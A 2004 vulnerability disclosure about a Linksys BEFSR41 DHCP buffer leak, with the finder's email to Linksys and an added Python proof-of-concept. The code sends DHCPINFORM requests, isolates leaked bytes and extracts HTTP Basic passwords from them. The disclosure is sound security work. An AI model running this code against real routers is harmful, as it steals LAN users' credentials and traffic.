Linksys BEFSR41 DHCP vulnerability: DHCP server leaks network data
On May 2nd 2004 I sent an email (detailed below) to Linksys concerning this 
vulnerability.  Linksys has since posted the vulnerability and a fix for the 
Revision 3 router here:

http://linksys.custhelp.com/cgi-bin/linksys.cfg/php/enduser/std_adp.php?p_faqid=832&p_created=1086294093&p_sid=pU1X1idh&p_lva=&p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD02NTQmcF9wYWdlPTE*&p_li=

Upgrades for Revs 1 & 2 are promised soon.

More details are included in the email:
************************
Linksys,

I believe I have found a vulnerability in your BEFSR41 router.  

The vulnerability involves a buffer leakage in the DHCP service. As a result, 
data that has recently passed through the router can be compromised by an 
attacker on the LAN.

This vulnerability was tested with firmware version 1.45.7.

Conditions required to exploit the vulnerability:
1) An attacking host on the LAN side of the router that can broadcast 
DHCP-INFORM packets to the LAN.  
2) A sniffer on the attacking host to record the router's response packets.
3) Data has recently passed between the LAN and WAN sides of the router.
4) DHCP is enabled on the router.

Details
I used a Windows 2000 DHCP server to create the DHCP-INFORM packets.  The 
server broadcasts the DHCP-INFORM message once an hour, or when the service is 
restarted.  These packets must be broadcast to the LAN side of the router.

If DHCP is enabled on the Router, it will respond to each broadcast with a 
packet containing leaked buffer data.  The response is sent directly to the IP 
address of the attacking host.  Approximately 488 bytes of the 590-byte 
response come from the router's buffer, providing easily recognizable 
fragments of recently viewed web pages, etc.

Effects of the vulnerability:
Data that has passed through the router recently can be compromised by an 
attacker with access to the LAN.  This can include email sent or received, web 
pages viewed, and passwords (cleartext or weakly encrypted) that have been used 
by a LAN client to access a WAN resource or vice versa.

Interesting notes about the vulnerability that make an attacker more difficult 
to detect:
- The attack does not rely on traditional methods to overcome switched 
networks. 

- The attacking host does not need to place its NIC in promiscuous mode.  

- It is also possible to craft DHCP-INFORM packets that are not broadcast, but 
directed at the router's address.

- This vulnerability also makes it possible to view data that was passed 
through the router at some time in the past, making it unnecessary to capture 
the traffic when it actually occurs.  This makes the physical aspect of 
security more difficult.  The victim and the attacker do not have to be on the 
LAN at the same time.

Here is an example of that last point:
1) A LAN user is visiting a website that requires HTTP-BASIC authentication, 
logs in, reads a few pages, and then closes the web browser.

2) At some point in the future, the attacker begins making DHCP-INFORM 
broadcasts from the LAN and collecting the buffer leakage that results.

3) Among the leaked data is the base64 encoded authorization that was used to 
access the HTTP-BASIC authenticated website.  The user's password has now been 
compromised.
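
As an added illustration of the request described under Details and of the 
HTTP-BASIC scenario above (example code written for this page, not the 
author's capture tooling and not anything from Linksys), the following Python 
builds a DHCPINFORM request, parses a DHCP reply, and pulls out the bytes a 
correct server would never send: anything after the END option, and non-null 
content in the sname/file fields, which a well-behaved server leaves zeroed.  
The advisory does not say where in the reply the BEFSR41 placed the leaked 
bytes, so treating those two regions as the candidate leak is an assumption of 
this example.  The reply packet, MAC address, IP addresses and the 
alice:s3cret credential are all constructed, not captured.

```python
"""
Added example, not code from the advisory or from Linksys.  It builds a
DHCPINFORM, parses a DHCP reply, and isolates bytes that should not be
there: everything after the END option and non-null content in the
sname/file fields.  Where the router really placed leaked data is not
stated in the advisory; those two regions are this example's assumption.
"""
import base64
import re
import socket
import struct

MAGIC_COOKIE = b"\x63\x82\x53\x63"
BOOTP_FMT = "!BBBBIHH4s4s4s4s16s64s128s"   # 236-byte fixed BOOTP header
DHCPINFORM, DHCPACK = 8, 5
OPT_PAD, OPT_MSG_TYPE, OPT_SERVER_ID, OPT_PARAM_REQ, OPT_END = 0, 53, 54, 55, 255
BASIC_RE = re.compile(rb"Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)")


def build_dhcpinform(mac: bytes, client_ip: str, xid: int = 0x1234ABCD) -> bytes:
    """BOOTREQUEST carrying DHCP message type 8 (DHCPINFORM).
    ciaddr is filled in because an INFORM client already has an address."""
    header = struct.pack(
        BOOTP_FMT,
        1, 1, 6, 0,                       # op=BOOTREQUEST, htype=Ethernet, hlen, hops
        xid, 0, 0x0000,                   # xid, secs, flags (0x8000 = ask for broadcast reply)
        socket.inet_aton(client_ip), b"\0" * 4, b"\0" * 4, b"\0" * 4,
        mac.ljust(16, b"\0"), b"\0" * 64, b"\0" * 128,
    )
    options = (bytes([OPT_MSG_TYPE, 1, DHCPINFORM])
               + bytes([OPT_PARAM_REQ, 3, 1, 3, 6])   # subnet mask, router, DNS
               + bytes([OPT_END]))
    return header + MAGIC_COOKIE + options


def parse_reply(pkt: bytes) -> dict:
    """Split a DHCP packet into message type, options and candidate leak."""
    if len(pkt) < 240 or pkt[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP packet")
    sname, fname = pkt[44:108], pkt[108:236]   # normally all zero
    opts, i, end = {}, 240, None
    while i < len(pkt):
        code = pkt[i]
        if code == OPT_PAD:
            i += 1
            continue
        if code == OPT_END:
            end = i
            break
        if i + 1 >= len(pkt):
            break                                # truncated option, stop walking
        length = pkt[i + 1]
        opts[code] = pkt[i + 2:i + 2 + length]
        i += 2 + length
    trailing = pkt[end + 1:] if end is not None else b""
    # Assumption: stale buffer data shows up after END or inside sname/file.
    leak = sname.strip(b"\0") + fname.strip(b"\0") + trailing
    return {"msg_type": opts.get(OPT_MSG_TYPE, b"\0")[0], "options": opts, "leak": leak}


def find_basic_credentials(leak: bytes) -> list:
    """Recover user:password pairs from any HTTP Basic headers in leaked bytes."""
    found = []
    for m in BASIC_RE.finditer(leak):
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("latin-1")
        except (ValueError, UnicodeDecodeError):
            continue
        if ":" in decoded:
            found.append(tuple(decoded.split(":", 1)))
    return found


def send_inform(pkt: bytes, dest: str = "255.255.255.255", timeout: float = 5.0) -> bytes:
    """Broadcast (or unicast, by passing the router's address) the request from
    UDP/68 and return the first reply.  Needs root for port 68; not run offline."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(("", 68))
    s.settimeout(timeout)
    s.sendto(pkt, (dest, 67))
    return s.recv(4096)


def constructed_reply() -> bytes:
    """A reply shaped like the advisory's description: a normal DHCPACK followed
    by 488 bytes of stale buffer.  Constructed for this example, not a capture."""
    header = struct.pack(
        BOOTP_FMT, 2, 1, 6, 0, 0x1234ABCD, 0, 0,
        socket.inet_aton("192.168.1.100"), b"\0" * 4,
        socket.inet_aton("192.168.1.1"), b"\0" * 4,
        bytes.fromhex("00e0981234ab").ljust(16, b"\0"), b"\0" * 64, b"\0" * 128,
    )
    options = (bytes([OPT_MSG_TYPE, 1, DHCPACK])
               + bytes([OPT_SERVER_ID, 4]) + socket.inet_aton("192.168.1.1")
               + bytes([1, 4]) + socket.inet_aton("255.255.255.0")
               + bytes([OPT_END]))
    stale = (b"GET /admin/ HTTP/1.1\r\nHost: intranet.example\r\n"
             b"Authorization: Basic " + base64.b64encode(b"alice:s3cret") + b"\r\n\r\n")
    return header + MAGIC_COOKIE + options + stale.ljust(488, b"\0")


if __name__ == "__main__":
    req = build_dhcpinform(bytes.fromhex("00e0981234ab"), "192.168.1.100")
    print("request bytes:", len(req), "leak in request:", len(parse_reply(req)["leak"]))
    info = parse_reply(constructed_reply())
    print("reply type:", info["msg_type"], "leaked bytes:", len(info["leak"]))
    print("credentials:", find_basic_credentials(info["leak"]))
```

A clean server's reply parses with an empty leak; only bytes past END or 
inside the zeroed fields count, so the same parser can be pointed at a real 
capture to measure how much of each reply is not DHCP at all.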

Mitigating Factors

- The attacker must be on the LAN. 

- Only data which is still in the buffer can be compromised.  This limits the 
vulnerable data to the last few most recently visited web pages or a similar 
amount of data.

- Passing "unimportant" data through the router will flush the buffer and 
prevent the compromise of more important data.

- Cycling power to the router will clear the buffer.

- The DHCP service can be disabled on the router, removing the vulnerability 
entirely.

Moving Forward

It is my intention to post this vulnerability on Bugtraq in 1 month.  However, 
I want to give Linksys every opportunity to prepare a fix for this 
vulnerability before it is made public.  If more than 1 month will be required 
to resolve this issue, please let me know and I will work with you. 

I hope I have not left out any important details.  Please do not hesitate to 
contact me if you have any questions, and I wish you the best of luck in 
finding a solution.  Capture files of the vulnerability being exploited are 
available to you if you need them.

Sincerely,

Lance Armstrong
********************

The response I received from Linksys on 5/3/2004 led me to believe that I was 
the first to bring this to their attention, but the Linksys posting did not 
credit anyone specifically with finding the vulnerability.